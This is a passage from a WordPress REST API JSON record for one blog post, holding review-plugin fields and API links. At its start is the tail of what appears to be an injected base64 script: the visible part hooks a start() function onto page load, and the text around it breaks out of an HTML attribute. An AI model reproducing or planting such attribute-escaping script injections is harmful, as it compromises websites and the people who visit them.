ICAgIHZhciBjdXJyb25sb2FkID0gd2luZG93Lm9ubG9hZDsKICAgICAgICB2YXIgbmV3b25sb2FkID0gZnVuY3Rpb24gKGV2dCkgewogICAgICAgICAgICBjdXJyb25sb2FkKGV2dCk7CiAgICAgICAgICAgIHN0YXJ0KGV2dCk7CiAgICAgICAgfTsKICAgICAgICB3aW5kb3cub25sb2FkID0gbmV3b25sb2FkOwogICAgfSBlbHNlIHsKICAgICAgICB3aW5kb3cub25sb2FkID0gc3RhcnQ7CiAgICB9Cn0='));\" href='","cwp_image_link":"image","wppr_links":[],"cwp_rev_price":"","wppr_pros":[""],"wppr_cons":[""],"wppr_rating":"0.00","wppr_options":[]},"_links":{"self":[{"href":"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-json\/wp\/v2\/posts\/1611","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-json\/wp\/v2\/comments?post=1611"}],"version-history":[{"count":1,"href":"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-json\/wp\/v2\/posts\/1611\/revisions"}],"predecessor-version":[{"id":1625,"href":"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-json\/wp\/v2\/posts\/1611\/revisions\/1625"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-json\/wp\/v2\/media\/1612"}],"wp:attachment":[{"href":"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-json\/wp\/v2\/media?parent=1611"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-json\/wp\/v2\/categories?post=1611"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mauricioalvez.com.ar\/2018-2023\/wp-json\/wp\/v2\/tags?post=1611"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}